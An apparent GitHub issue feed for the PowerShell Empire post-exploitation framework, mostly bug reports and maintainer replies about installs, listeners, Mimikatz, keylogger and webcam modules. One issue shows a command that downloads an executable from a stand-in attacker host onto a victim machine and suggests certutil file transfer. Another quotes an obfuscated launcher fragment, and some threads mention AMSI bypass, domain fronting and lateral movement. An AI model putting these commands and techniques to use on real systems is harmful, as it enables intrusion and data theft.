**To Reproduce**
Step

[2020-04-18 15:18] Cx01N commented on #178
@TKD-SEC please provide the steps to recreate the issue and screenshots. The OneDrive listener still appears to be working for me. Be sure to follow the steps in the blog exactly, otherwise, you may experience an error.

[2020-04-18 15:20] Cx01N commented on #181
@ghost5egy We must have missed a few lines during the python3 conversion. I will see about getting this fixed in a future release. We also take PRs if you think you can fix it. Thanks.

[2020-04-18 15:21] x1n5h3n commented on #177
[...]

Package python-m2crypto is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source

E: Package 'python-m2crypto' has no installation candidate
E: Unable to locate package python-pip

[...]

sudo: pip: command not found
Traceback (most recent call last):
  File "./setup_database.py", line 4,

[2020-04-18 15:49] Hubbl3 commented on #179
@sh1va73 that error is indicating that there was an agent attempting to connect to the server that wasn't recognized by Empire. So one of your VMs likely had an old agent running still from a previous install.

[2020-04-21 06:23] Gl3bGl4z opened #183 "[BUG] if UserAgent or SlackToken is set in http listener, the functionality breaks"
**Empire Version**
- Empire 3.1.4-0 and 3.1.5

**OS Information (Linux flavor, Python version)**
- OS: Kali linux, debian 8
- Python: 3

Package: powershell-empire
Version: 3.1.4-0kali2
Priority: optional
Section: misc
Maintainer: Kali Developers <devel@kali.org>
Installed-Size: 23.4 MB
Depends: python3-bcrypt, python3-crypto, python3-cryptography, python3-dropbox, python3-flask, python3-iptools,

[2020-04-22 01:51] #169 closed

[2020-04-22 01:52] #179 closed

[2020-04-22 20:52] Cx01N commented on #183
Closing this issue since its a duplicate with #181

[2020-04-22 20:52] #183 closed

[2020-04-22 20:55] Cx01N commented on #181
@ghost5egy @Gl3bGl4z
I fixed the slack encoding issue, however, it looks like slack is dropping legacy API support and will discontinue token creation on May 5th. I recommend getting a new token ASAP before they drop that functionality. Especially since it may be some time before we update the slack functionality to work with the newer API.

[2020-04-27 06:30] #181 closed

[2020-04-27 06:30] Cx01N commented on #178
Closing due to inactivity.

[2020-04-27 06:30] #178 closed

[2020-04-27 06:32] Cx01N commented on #177
@x1n5h3n The new build should address this issue but please let us know if you are still having issues.

[2020-04-27 06:35] Cx01N commented on #166
@sh1va73 I do not think there is going to be a sure way to fix this issue. However, I tested my updates on both the Xcode and Homebrew python 3 installs and was able to run without any issues.
Hopefully, this will be resolved once Mac has Python 3 as a default install.

[2020-04-28 14:31] #177 closed

[2020-04-28 23:49] #166 closed

[2020-05-01 02:38] shelladdection opened #192 "Mimikatz Command"
hi,

in mimikatz.exe you can run things without admin user like: dpapi::masterkey
but in mimikatz module in Empire non privilege users can't run mimikatz commands
please allow that in order to use dpapi::masterkey

[2020-05-01 02:38] #192 closed

[2020-05-01 02:45] shelladdection opened #193 "[FEATURE REQUEST] Allow unprivileged users to run Mimikatz commands"
**Is your feature request related to a problem? Please describe.**
in mimikatz.exe you can run things without admin user like: dpapi::masterkey
but in mimikatz module in Empire non privilege users can't run mimikatz commands

**Describe the solution you'd like**
please allow unprivileged users to use "/credentials/mimikatz/command" in order to use dpapi::masterkey

**Describe alternatives you've c

[2020-05-01 03:06] Cx01N commented on #193
We will look into this. Thank you.
FYI for the future, please provide a title for your feature requests or bug issues.

[2020-05-04 08:05] blshkv opened #195 "[BUG] xlutils dependancy came to EOL"
The repository outdated, supports Python 3.5 only, and it has been archived by the author recently
https://github.com/python-excel/xlutils/

Please find an alternative with python 3.6 and above support.

[2020-05-04 08:05] #195 closed

[2020-05-04 08:10] blshkv opened #196 "[BUG] xlutils dependancy came to EOL"
**Empire Version**
- Empire git

**OS Information (Linux flavor, Python version)**
- OS: Pentoo
- Python: Python 3.7 and 3.8

**Describe the bug**
The repository outdated, supports Python 3.5 only, and it has been archived by the author recently
https://github.com/python-excel/xlutils/

Please find an alternative with python 3.6 and above support.

**To Reproduce**
Steps to reproduce the behavior:

[2020-05-06 14:48] w1ld3r opened #198 "[BUG] CLI stager generation don't give back hand"
**Empire Version**
- Empire 3.2.0

**OS Information (Linux flavor, Python version)**
- OS: Ubuntu 18.04.4 LTS x86_64
- Python: Python 2.7.17

**Describe the bug**
When generating a stager in CLI with an http listener, the command don't give back hand

**To Reproduce**
Steps to reproduce the behavior:
1. Generate a http listener in sudo:
1.1 `sudo ./empire`
1.2 `uselistener http`
1.3 `set Host 41.1

[2020-05-06 14:53] w1ld3r opened #199 "[FEATURE REQUEST] Create stager totaly in CLI"
**Is your feature request related to a problem? Please describe.**
Unable to create stager without using the Empire shell.
It can be intersting for automated generation of payloads to don't have to use the Empire shell to create a stager.

**Describe the solution you'd like**
Be able to create listener in CLI or be able to create a stager in CLI with listener options.

**Describe alternatives you'

[2020-05-08 05:52] pawp81 opened #201 "[BUG] Onedrive listener fails to execute"
**Empire Version**
- Empire 3.2

**OS Information (Linux flavor, Python version)**
- OS: Kali Linux 2020.2
- Python: python 3.8.2

**Describe the bug**
After setting AuthCode and executing the listener, I receive following error:

[code]

**To Reproduce**
1. Create an Azure AD as described here: https://www.bc-security.org/post/using-the-onedrive-listener-in-empire-3-1-3/
2. Set ClientID and Clien

[2020-05-08 23:53] Cx01N commented on #201
@pawp81 It looks like Microsoft added a third account type into the mix. If you select `Accounts in my organizational structure directory (Any Azure AD directory and personal Microsoft accounts` it should fix the problem.

I just tested it and those changes should do the trick. Did it work for you?

![image](https://user-images.githubusercontent.com/20302208/81457738-302cb600-914c-11ea-9e21-c8a43b

[2020-05-08 23:54] Cx01N commented on #201
@pawp81 Also, I just noticed that your Authcode is a bit too long. Make sure you are pulling only the short code that is found in our blog.
https://www.bc-security.org/post/using-the-onedrive-listener-in-empire-3-1-3/

[2020-05-11 15:16] pawp81 commented on #201
I selected the option "Accounts in any organization directory (Any Azure AD directory - Multitenant) and persona Microsoft accounts (e.q. Skype, Xbox) when provisioning the app.
Regarding AuthCode being too long. This is the AuthCode I am receiving back from Azure AD. :-)

Btw how the listener and stager should work? When listener is started shall it do anything with OneDrive of the user, which th

[2020-05-11 23:14] #193 closed

[2020-05-12 02:22] Cx01N commented on #201
@pawp81 From all the times I have tested the listener, I have never seen an Auth code like that. But I won't complain if it works.

As for how it works. It leverages the your onedrive account and places the files in there for the target machine to call back to which then is relayed to your Empire server. You can find the files in the Empire folder on your onedrive account. The information is encod

[2020-05-12 05:48] pawp81 commented on #201
Have you used Azure AD used by Office 365 tenant at the same time?

[2020-05-13 12:21] pawp81 opened #204 "[BUG] windows/launcher_bat "Unable to connect to the remote server" error"
**Empire Version**
- Empire 3.2

**OS Information (Linux flavor, Python version)**
- OS: Kali Linux 2020.2
- Python: 3.8.2

**Describe the bug**
Executing windows/launcher_bat on Windows machine generates the error:
C:\Users\>Exception calling "DownloadData" with "1" argument(s): "Unable to connect to the remote server"
At line:1 char:1808
+ ... NRp4B+j9djanl9ie81paUkI=");$DATa=$E6Cc5.DownlOADDAta

[2020-05-13 13:06] pawp81 commented on #204
Sending file using nc resolve the problem

[2020-05-13 13:06] #204 closed

[2020-05-13 22:05] shelladdection opened #205 "[FEATURE REQUEST] Allowing upload files larger than 1MB"
**Is your feature request related to a problem? Please describe.**
Agent is refusing to upload file larger than 1MB

**Describe the solution you'd like**
to increase the limit of file size that agent uploads to victim machine

**Describe alternatives you've considered**
i did workarounds like "shell IWR -Uri http://hacker/file.exe -o file.exe"

**Additional context**
some times my workaround is no

[2020-05-13 22:43] Cx01N commented on #205
@shelladdection Thanks for letting us know. I guess there were some issues in the past when allowing larger file sizes (https://github.com/EmpireProject/Empire/issues/323) and that's where the limit came from. We are always accepting PRs, so if you have a solution that you would like to submit, it would be much appreciated.

[2020-05-13 22:50] Cx01N commented on #201
@pawp81 I'm going to close this issue, but feel free to reach out to us on the [Bloodhoundgang slack](https://bloodhoundgang.herokuapp.com/) in the psempire channel. We are happy to answer any questions there about implementation or troubleshooting.

[2020-05-13 22:50] #201 closed

[2020-05-13 23:02] shelladdection commented on #205
I think this is beyound my abilities but as a temp solution i suggest developing another module which transfer files by converting them to base64 in kali then transfer it to the host then converting them back to the original state using cert-util on windows. hope this idea is good as temp solution

[2020-05-14 00:11] Cx01N commented on #205
That's a good idea that I'll look into. I'm pretty sure we can borrow some of the concepts from the screenshot module since it implements something similar.

[2020-05-14 08:23] oski02 opened #208 "Obfuscate Error"
## Empire Version

[Version] 3.2.1 BC-Security Fork

## OS Information (Linux flavor, Python version)

Debian GNU/Linux 10 (buster)

Python 3.7.5

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.

## Screenshot of error, embedded text output, or Pastebin link to the error

An error appears when try to Obfusca

[2020-05-14 08:23] #208 closed

[2020-05-14 08:25] oski02 opened #209 "[BUG] Obfuscate Error"
## Empire Version

[Version] 3.2.1 BC-Security Fork

## OS Information (Linux flavor, Python version)

Debian GNU/Linux 10 (buster)

Python 3.7.5

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.

## Screenshot of error, embedded text output, or Pastebin link to the error

An error appears when try to Obfusca

[2020-05-14 08:25] #209 closed

[2020-05-17 14:45] meetgyn commented on #74
Thank you so much men, I had the same problem and it was solved

[2020-05-25 05:04] NonsoEchendu opened #212 "Gives this error: ModuleNotFoundError: No module named '_sqlite3', when I try to run empire"
## Empire Version
3.2.1

## OS Information (Linux flavor, Python version)
Kali Linux 2020.2

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.
Installation caught a few errors:
WARNING: pip is configured with locations that require TLS/SSL, however the ssl module in Python is not available.
ERROR: Could not fi

[2020-05-25 18:51] Cx01N commented on #212
@NonsoEchendu You are getting a connection failed at the beginning. It looks like you don't have access to the internet on your machine. You will need to bridge your Kali VM to install the dependencies. Let us know if that fixes the issue.

[2020-05-25 19:13] NonsoEchendu commented on #212
I have very good internet access.

On Mon, May 25, 2020, 7:52 PM Anthony Rose <notifications@github.com> wrote:

[2020-05-25 19:38] NonsoEchendu commented on #212
My Kali's internet isn't a problem

[2020-05-26 03:23] Hubbl3 commented on #212
@NonsoEchendu if you haven't already try running `sudo apt update` and then `sudo apt upgrade`

I just tried installing on a new Kali 2020.2 install and had no issues. You can also try installing through the package manager using ` sudo apt install powershell-empire`

If you still have issues can you please provide more details on how you installed Kali and if you have installed any other packages

[2020-05-26 09:20] b4b857f6ee opened #215 "[BUG] -Keylogger"
**Empire Version**
- Empire 3.2.2

**OS Information (Linux flavor, Python version)**
- OS:  Kali
- Python: python3  (as the empire executed file need)

**Describe the bug**
Hello, yes the file keystrokes.txt but even before i only get maybe 1/200 stroke i can see on the file... is there is a specific configuration needed?
listener : http
Agents : windows/launcher_bat
module collection/keylogger

*

[2020-05-26 09:20] #215 closed

[2020-05-26 09:23] b4b857f6ee opened #216 "[BUG] - collection/Keylogger not working properly"
**Empire Version**
- Empire 3.2.2

**OS Information (Linux flavor, Python version)**
- OS:  Kali
- Python: python3  (as the empire executed file need)

**Describe the bug**
Hello, yes the file keystrokes.txt now working in 3.2.2(he is create) but even before i only get maybe 1/200 stroke i can see on the file... is there is a specific configuration needed?
listener : http
Agents : windows/launcher

[2020-05-26 09:23] #216 closed

[2020-05-26 09:25] b4b857f6ee opened #217 "[BUG] Keylogger"
**Empire Version**
- Empire 3.2.2

**OS Information (Linux flavor, Python version)**
- OS: Kali
- Python: Python3

**Describe the bug**
Hello, yes the file keystrokes.txt now working in 3.2.2(he is create) but even before i only get maybe 1/200 stroke i can see on the file... is there is a specific configuration needed?
listener : http
Agents : windows/launcher_bat
module collection/keylogger

**T

[2020-05-26 13:15] b4b857f6ee commented on #199
Yes, even with that i can succeed to export in /tmp/ the payload
https://github.com/BC-SECURITY/Empire/wiki/Stagers#generate-stager

[2020-05-26 18:04] NonsoEchendu commented on #212
@Hubbl3 Thanks so much man. re-ran the sudo apt update and sudo apt upgrade. (though i had done it before). Then i used the sudo apt install powershell-empire, instead of git cloning and installing from the folder.
Worked immediately. Thanks so very much, i appreciate

[2020-05-26 23:54] #212 closed

[2020-05-31 12:50] r00t3rSaab opened #218 "Empire install.sh throws error"
**Empire Version**
- Empire 3.2.2

**OS Information (Linux flavor, Python version)**
- OS: Linux [SNIP] 5.3.0-kali2-amd64 #1 SMP Debian 5.3.9-3kali1 (2019-11-20) x86_64 GNU/Linux
- Python: 2.7.7

**Describe the bug**
A clear and concise description of what the bug is.

**To Reproduce**
Steps to reproduce the behavior:
1. Clone Empire (BC-Security)
2. Install (./install.sh)
3. Error thrown:

**Erro

[2020-05-31 12:50] #218 closed

[2020-05-31 12:53] r00t3rSaab opened #219 "[BUG] Install.sh throws error"
**Empire Version**
- Empire 3.2.2

**OS Information (Linux flavor, Python version)**
- OS: Linux [SNIP] 5.3.0-kali2-amd64 #1 SMP Debian 5.3.9-3kali1 (2019-11-20) x86_64 GNU/Linux
- Python: 2.7.7

**Describe the bug**
Upon running install.sh, the application threw an error.

**To Reproduce**
Steps to reproduce the behavior:
1. Clone Empire (BC-Security)
2. Install (./install.sh)
3. Error thrown:

*

[2020-05-31 17:03] vinnybod commented on #219
These are just warnings that the compiler spits out when building xar, so there's no errors causing the script to fail as far as i can tell.

[2020-06-01 09:42] Uxinnn opened #221 "[BUG] Duplicate results in returning results of tasking via API"
**Empire Version**
- Empire 3.2.2

**OS Information (Linux flavor, Python version)**
- OS: Ubuntu 18.04
- Python: 3.7.5

**Describe the bug**
Upon returning results of a command via API, 'results' field contains duplicate output.

**To Reproduce**
Steps to reproduce the behavior:
1. Run a command on an agent (Eg. shell whoami)
2. Use the API to get results of the command call.
3. 'results' field o

[2020-06-01 09:42] #221 closed

[2020-06-08 09:00] sh1va73 opened #225 "error after todays update"
Empire was running fine but after todays update I get this error:

[+] Listener successfully started!
[!] Error starting listener: table reporting has no column named timestamp
[*] Empire starting up...
Traceback (most recent call last):
  File "./empire", line 1558, in <module>
    main = empire.MainMenu(args=args)
  File "/opt/Empire/lib/common/empire.py", line 133, in __init__
    dispatcher.se

[2020-06-08 09:00] #225 closed

[2020-06-08 09:31] sh1va73 opened #226 "[BUG] error after todays update"
**Empire Version**
- Empire 3.2.2
**OS Information (Linux flavor, Python version)**
- OS: Kali 2020.2
- Python: 3.8.3
**Describe the bug**
Empire was running fine but after todays update I get this error:

[+] Listener successfully started!
[!] Error starting listener: table reporting has no column named timestamp
[*] Empire starting up...
Traceback (most recent call last):
File "./empire", line 1

[2020-06-08 09:31] #226 closed

[2020-06-08 09:33] sh1va73 commented on #226
I did use the template! why you close again??

[2020-06-08 09:34] sh1va73 opened #227 "[BUG] error after todays error"
Empire Version

Empire 3.2.2
OS Information (Linux flavor, Python version)
OS: Kali 2020.2
Python: 3.8.3
Describe the bug
Empire was running fine but after todays update I get this error:
[+] Listener successfully started!
[!] Error starting listener: table reporting has no column named timestamp
[*] Empire starting up...
Traceback (most recent call last):
File "./empire", line 1558, in
main = emp

[2020-06-08 16:54] vinnybod commented on #227
rerun the setup script `sudo setup/reset.sh`, the db schema was updated

[2020-06-09 02:21] #227 closed

[2020-06-09 02:22] #219 closed

[2020-06-09 18:52] Cyb3rWard0g opened #228 "[BUG] WebcamRecorder - Exception calling ".ctor" with "2" argument(s): "Value does not fall within the expected range.""
**Empire Version**
- Empire 3.2.3

**OS Information (Linux flavor, Python version)**
- OS: Ubuntu 18
- Python: 3.7

**Describe the bug**
I am trying to validate this research

Tweet (Detection Perspective) : https://twitter.com/Cyb3rWard0g/status/1269716610505486342

So, I decided to see if my audit rule would capture the use of the webcam after running the `powershell/collection/WebcamRecorder` m

[2020-06-11 04:20] Invoke-Mimikatz opened #229 "[BUG] Invoke-ReflectivePEInjection C# executables crash Powershell"
**Empire Version**
- Empire 3.2.3

**OS Information (Linux flavor, Python version)**
- OS:
- Python:

**Describe the bug**
Some EXE files are not usable with Invoke-ReflectivePEInjection. In testing, it seems C# binaries are affected. Normal C binaries are able to be loaded just fine.

**To Reproduce**
Steps to reproduce the behavior:
1. Import-Module Invoke-ReflectivePEInjection
2. Invoke-Reflect

[2020-06-15 22:55] Cyb3rWard0g commented on #228
Good afternoon,

I was wondering if you guys had any ideas about what it might be causing this? thank you in advance!

[2020-06-17 07:23] b4b857f6ee commented on #217
Sorry for my answer, i'm going to test it with the new release as soon as i can maybe next week.
I'm on the Empire v3.2.3 Ubuntu 18.04 i have python 3.8,3.7, 3.6,2.7 on the VM. 4CPU and 8G RAM.
All VM of course :).

[2020-06-19 23:30] Gimpy42 opened #230 "[BUG] Azure Domain Fronting Issue"
**Empire Version**
- Empire 3.2.3

**OS Information (Linux flavor, Python version)**
- OS: ubuntu 18.04 LTS – Azure and AWS VM
- Python: Python 3.6.9

**Describe the bug**
Powershell payload do not work when using azure domain fronting but do work without the domain fronting or with Empire 2.5 with&&without domaine fronting

**To Reproduce**
Steps to reproduce the behavior:
1. Install Empire on a

[2020-06-20 01:43] Hubbl3 commented on #228
@Cyb3rWard0g I wrote a response 3 days ago and some how it didn't post. We have confirmed the issue but haven't had time to look into root cause yet with our class coming up this weekend.

In general though that error is a result of a function being called with the wrong number of arguments. That can either be too many arguments or too few. If it's too few that can further be an issue either up st

[2020-06-20 04:00] Cyb3rWard0g commented on #228
Thank you very much for the additional information @Hubbl3 ! I hope you guys have a great time during training! Enjoy your weekend 🍻 I can wait no worries. I will also do some reading myself.

[2020-06-22 11:22] b4b857f6ee commented on #217
I test it one more time and same things :/.
![image](https://user-images.githubusercontent.com/36012515/85282090-6b304200-b48b-11ea-8d7d-c2a0ef5f69b5.png)

And i get only this :

![image](https://user-images.githubusercontent.com/36012515/85282112-74b9aa00-b48b-11ea-89a3-9a7cf112dccf.png)

nb : my system doesn't have Internet access.

[2020-06-23 00:10] Cx01N commented on #217
@b4b857f6ee I thought I fixed the issue in the last update where the keylogger was printing to the screen to the Empire CLI instead of the agents folder. Is there a file under downloads as well?

[2020-06-23 11:54] b4b857f6ee commented on #217
@Cx01N Yes :
![image](https://user-images.githubusercontent.com/36012515/85400584-ed3a6c80-b558-11ea-938c-62aba8248422.png)

But same.

[2020-06-23 14:55] b4b857f6ee opened #231 "[BUG] Lateral movement proxy agent"
**Empire Version**
- Empire 3.2.3

**OS Information (Linux flavor, Python version)**
- OS: Kali
- Python: Python3

**Describe the bug**
Looking if we already have a module to do a lateral movement by using th 1 infected workstation as a proxy for the others workstation who don't have an internet access.

**To Reproduce**
Proxy agent connexion

**Expected behavior**
Control Workstation with an agen

[2020-06-24 03:11] Hubbl3 commented on #231
Yes we do have a redirector agent that allows for this. However, we don't currently have an SMB listener

[2020-06-24 03:14] #173 closed

[2020-06-25 01:30] Hubbl3 commented on #229
@Invoke-Mimikatz  sorry for not responding earlier this is a known bug I plan on trying to fix next week. C# is a .Net language and when you compile into an .exe it actually has a different format than a unmanaged exe (a C program). That's why one works but the other doesn't

[2020-06-28 23:20] Cx01N commented on #217
@b4b857f6ee Sorry, I am having issues recreating the problem. Can you run --reset and respawn your agent in Empire 3.2.3?
I just want to rule out that the agent isn't running old code from another version. The agent should only write the keystrokes to the keystrokes.txt file as of version 3.2.2.

[2020-06-28 23:29] Cx01N opened #232 "[BUG] Missing agent timestamp colors"
**Empire Version**
- Empire 3.2.3

**OS Information (Linux flavor, Python version)**
- OS: Kali 2020.2
- Python: Python 3.8.3

**Describe the bug**
Inconsistent returned strings from the new timezone aware timestamps. Sometimes they include 'T' between the date and time.

**To Reproduce**
Steps to reproduce the behavior:
1. Run an agents
2. Have agents check-in
3. Last seen time may include 'T' as

[2020-06-29 08:22] b4b857f6ee commented on #217
Now i have nothing when i launch the keylogger module.

[2020-06-30 00:05] Hubbl3 commented on #228
@Cyb3rWard0g can you give more information on the target machine? We have tested on 4 different machines and gotten 4 different results... Everything from running fine when used on it's to completely different errors then what you are getting.

[2020-06-30 00:14] Hubbl3 commented on #217
@b4b857f6ee are you running this as a docker container? I just tested again and your screen shot is showing output from a version prior to 3.2.2. If you are using a docker volume it's a little tricky to upgrade. Also if you are using apt to install Empire then make sure you run `sudo apt update` prior to reinstalling

[2020-06-30 12:09] b4b857f6ee commented on #217
No docker. Ok i will try to force update :)

[2020-06-30 16:12] bcnx opened #233 "Mimikatz does not start"
Empire version 3.2

Kali Linux, latest version

Output: (Empire: PE1) > mimikatz
[*] Tasked 2LF9P8MG to run TASK_CMD_JOB
[*] Agent 2LF9P8MG tasked with task ID 1
[*] Tasked agent PE1 to run module powershell/credentials/mimikatz/logonpasswords

But I don't get the Mimikatz splash screen and Mimikatz prompt. I installed with apt install.

Cheers,

BC

[2020-06-30 16:12] #233 closed

[2020-06-30 16:56] bcnx opened #234 "[BUG] Mimikatz does not launch"
**Empire Version**
- Empire 3.2

**OS Information (Linux flavor, Python version)**
- OS: Kali Linux Rolling
- Python: 3.8.3

**Describe the bug**
After giving the mimikatz command the program is not launched, no mimikatz splash screen is observed and the command prompt does not change.

**To Reproduce**
Steps to reproduce the behavior:
1. Go to elevated agent session (high integrity)
2. Enter "mim

[2020-06-30 18:01] Cx01N commented on #234
Reopening issues.
Just for future reference, the issue template requires all of the sections.

[2020-06-30 18:20] bcnx commented on #234
You might want to change the "If applicable" part of the template then.

[2020-06-30 20:06] bcnx commented on #234
Some further research suggests that this could be related to Windows 10 update 1809 update.

[2020-06-30 21:49] Cx01N commented on #234
@bcnx thank you for the feedback. We will consider loosening the requirements in the future.

[2020-06-30 22:08] bcnx commented on #234
@Cx01N  Is there a way to still get it to work?

[2020-07-01 01:44] Cx01N commented on #234
I tried testing it on a few of my machines (1803, 1903, 1909, 2004) and they all appear to be working fine. Unfortunately, I do not have an 1809 box at the moment. Could you provide a few more details so I can try to mirror the setup?

What version of Empire? (3.2.3?)
Which listener?
Which stager?
Windows? (I can assume Windows 10 1809 but just wanted to double-check)
Is the agent executing the ta

[2020-07-01 11:39] bcnx commented on #234
Hi,
this related to a box in the OSCP labs.
Empire version: 3.2.3 supplied with apt on Kali, but I also did a git clone of what I think probably is the latest version.
HTTP listener.
windows/launcher_bat
Windows: I only have CLI access and doing a sysinfo pointed to a 14393 build. Not sure how this relates to the 4-number version numbers.
The task is executed, I see a job number, but then it retur

[2020-07-01 17:55] bcnx commented on #234
Hi,
I used my same Empire install to another OSCP lab box and there it run without problems. So it is linked to this particular Windows version,

BC

[2020-07-02 02:47] Hubbl3 commented on #234
@bcnx if this is in an OSCP lab it's pretty hard for us to help you trouble shoot as they set up boxes to intentionally break things to force lab participants to either modify their tools by hand or use a different method. As such it's almost impossible for us to know if the issue is a problem with Empire or some intentional configuration in the lab

[2020-07-02 11:44] bcnx commented on #234
Hi,
well, the standalone Mimikatz executable did function correctly on that particular host, so I'm not sure the problem is related to the host being deliberately broken.

[2020-07-02 12:06] Hubbl3 commented on #234
@bcnx Have you been able to able to reproduce this on any other machines? As @Cx01N  told you with have tested this on about a half dozen different machines and have not been able to reproduce. OSCP labs are about creating weird quirks in the environment that you have to solve. There could be an AV product that kills powershell touching LSASS , poewrshell could be running in some kind of constrain

[2020-07-06 01:06] JeMunos opened #239 "external/generate_agent[BUG]"
**Empire Version**
- Empire 3.2.0 BC Security Fork

**OS Information (Linux flavor, Python version)**
- OS: Kali
- Python: 2.7.18

**Describe the bug**
Trying to create a basic external listener. Specifics provided below.

**To Reproduce**
Steps to reproduce the behavior:

[code]

**Expected behavior**
[code]

**Screenshots**
If applicable, add screenshots to help explain your problem.

**Addition

[2020-07-06 02:21] Cx01N commented on #239
Sorry, the issue template is really picky on the formatting.
I am seeing the same issue you are which is an easy fix, but there are some other agent issues that haven't been updated for a long time. Let me see if I can get it working and put out a branch for you to test.

[2020-07-06 02:43] Cx01N commented on #239
It seems to be working on my end. Let me know if the [branch](https://github.com/BC-SECURITY/Empire/tree/external_agent_fix) works for you and I will get it merged for the next release.

[2020-07-06 03:04] JeMunos commented on #239
So i tried the fix "chars = string.ascii_uppercase + string.digits"
However this results in another bug that I don't know how to track down.
[code]

[2020-07-06 03:13] Cx01N commented on #239
I just noticed that you listed Python: 2.7.18. You'll have to make sure you are running Python 3.7 or 3.8. We no longer support Python 2.

[2020-07-06 03:24] JeMunos commented on #239
Fair. Stupid question.
How do I force it to run using the installed version of python3? Kali comes with both

[2020-07-06 03:48] JeMunos commented on #239
So I used this guide: https://linuxconfig.org/how-to-change-default-python-version-on-debian-9-stretch-linux
and set my default python version to 3.8

[code]

However I'm still seeing the same issue with the staging key error I posted above. Could this be because the initial setup I did was using 2.7 and I need to reset the environment? Maybe. I'll try that.

[2020-07-06 03:53] JeMunos commented on #239
Looks like this issue existed in the old version as well
https://github.com/EmpireProject/Empire/issues/739

[2020-07-06 03:57] #239 closed

[2020-07-09 19:05] #234 closed

[2020-07-09 19:06] Cx01N commented on #217
@b4b857f6ee Were you able to fix the problem?

[2020-07-10 14:50] #232 closed

[2020-07-11 04:38] Invoke-Mimikatz commented on #217
I still have problems with the keylogger missing some keystrokes:

![image](https://user-images.githubusercontent.com/57604669/87216549-6a5e3380-c306-11ea-8d6a-9de5b85a36c5.png)

[2020-07-11 05:25] ricko2991 opened #248 "[!] Exception: name 'bypasses' is not defined [BUG]"
**Empire Version**
- Empire 3.2.3

**OS Information (Linux flavor, Python version)**
- OS: kali linux 2019.4
- Python:  V3.8.3

**Describe the bug**
Hi, can you help me.
Well, i run empire listener use http_foreign
I use ngrok for listener. And 1 other listener use http which bind to my static
ip address.
When i execute the usestager windows/launcher_bat, the payload is not execute and give me mes

[2020-07-11 05:25] #248 closed

[2020-07-11 05:29] ricko2991 opened #249 "[BUG]"
**Empire Version**
- Empire 3.2.3

**OS Information (Linux flavor, Python version)**
- OS: kali linux 2019.4
- Python:  V3.8.3

**Describe the bug**
Hi, can you help me.
Well, i run empire listener use http_foreign
I use ngrok for listener. And 1 other listener use http which bind to my static
ip address.
When i execute the usestager windows/launcher_bat, the payload is not execute and give me mes

[2020-07-11 05:29] #249 closed

[2020-07-11 05:43] ricko2991 opened #250 "[BUG] not create output when execute use listener http_foreign"
**Empire Version**
- Empire 3.2.3

**OS Information (Linux flavor, Python version)**
- OS: kali linux 2019.4
- Python: 3.8.3

**Describe the bug**
Hi, can you help me.
Well, i run empire listener use http_foreign
I use ngrok for listener. And 1 other listener use http which bind to my static
ip address.
When i execute the usestager windows/launcher_bat, the payload is not execute and give me messa

[2020-07-11 20:13] Cx01N commented on #250
@ricko2991 We recently pushed out an update that should fix the missing bypass dependency. We also added the option to choose your AMSI Bypass for your launcher. FYI, you will need to run `--reset` after updating to 3.3.0. Let us know if you keep seeing issues after updating.

[2020-07-12 02:17] ricko2991 commented on #250
Thank you.

[2020-07-12 02:17] #250 closed

[2020-07-12 02:36] ricko2991 opened #251 "[BUG] [!] facivon.ico requested by 127.0.0.1 with no routing packet"
**Empire Version**
- Empire 3.3.0

**OS Information (Linux flavor, Python version)**
- OS: kali
- Python: 3.8.3

**Describe the bug**
Well, when i create listener http_foreign for stager windows/launcher_bat. Then, give me alert like this when i open the link.
[!] facivon.ico requested by 127.0.0.1 with no routing packet

**To Reproduce**
[facivon.ico requested by 127.0.0.1 with no routing packet

[2020-07-12 03:20] Hubbl3 commented on #251
@ricko2991 can you provide the a screen shot with the options you are using for the foreign listener. Also are you getting this error on the Empire server you are building the payload on or the target Empire server that the stager should be calling back too?

[2020-07-12 06:00] ricko2991 commented on #251
This is my http_foreign options
![Screenshot (32)](https://user-images.githubusercontent.com/67855001/87239943-4c4c1c80-c447-11ea-94fb-d62c22a39b95.png)

I create 2 listeners. 1 for ngrok server and 1 for calling back to my localhost
![Screenshot (33)](https://user-images.githubusercontent.com/67855001/87239966-8a494080-c447-11ea-9b57-895a1c664591.png)

But then when i open ngrok server. Nothing o

[2020-07-12 16:48] Cx01N commented on #217
@b4b857f6ee I was finally able to reproduce the issue. Apparently, it does not manifest itself on my VMs the same way it does on actual hardware. But, we made a change to the module which should fix some of the issues. You can also now choose the delay between key polls but it may come at the cost of CPU usage on the target.

[2020-07-13 06:25] ishmam-newaz opened #253 "WARNING: This is a development server. Do not use it in a production deployment."
WARNING: This is a development server. Do not use it in a production deployment. What should I do??

[2020-07-13 06:25] #253 closed

[2020-07-13 06:32] ishmam-newaz opened #254 "WARNING: This is a development server. Do not use it in a production deployment."
## Empire Version 3.3.0

## OS Information (Kali Linux, Python version 2.7.18)

## WARNING: This is a development server. Do not use it in a production deployment.

(https://user-images.githubusercontent.com/57004862/87277778-d3ab9580-c504-11ea-9a88-21774efce652.png)

Please Tell me what should I do to solve this problem

[2020-07-13 06:32] #254 closed

[2020-07-13 06:34] ishmam-newaz opened #255 "WARNING: This is a development server. Do not use it in a production deployment."
## Empire Version 3.3.0

## OS Information (Kali Linux, Python version 2.7.18)

## WARNING: This is a development server. Do not use it in a production deployment.

##Image has been given:

(https://user-images.githubusercontent.com/57004862/87277924-21c09900-c505-11ea-826b-2b0ada09dc56.png)

##Please tell me how to fix this error.

[2020-07-13 06:34] #255 closed

[2020-07-13 06:44] ishmam-newaz opened #256 "WARNING: This is a development server. Do not use it in a production deployment."
**Empire Version**

Empire 3.3.0

**OS Information (Linux flavor, Python version)**
1. OS: kali
2. Python: 3.8.3

**Describe the bug**
When I'm trying to open a Listener this warning shows me: WARNING: This is a development server. Do not use it in a production deployment. I'm New in using Empire. Please help me.

**To Reproduce**
N/A

**Expected behavior**
Should have not give me this warning old

[2020-07-13 14:33] metasploitmsf opened #257 "[BUG]The agent "dies" immediately but the powershell process continues to run on the target machine"
**Empire Version**
- Empire 3.3.0

1) OS: Ubuntu 18.04; 20.04
2)  Python: Python 3.8.2
3)  pip3 --version
pip 20.0.2 from /usr/lib/python3/dist-packages/pip (python 3.8)
4) Listener http(port 443)
5) Stager multi/launcher

**Describe the bug**
The agent arrives and immediately "dies", but the powershell process continues to run on the target machine

**Screenshots**

**Additional context**
Add any

[2020-07-13 14:33] #257 closed

[2020-07-13 14:51] metasploitmsf opened #258 "[BUG] The agent arrives and immediately "dies""
**Empire Version**
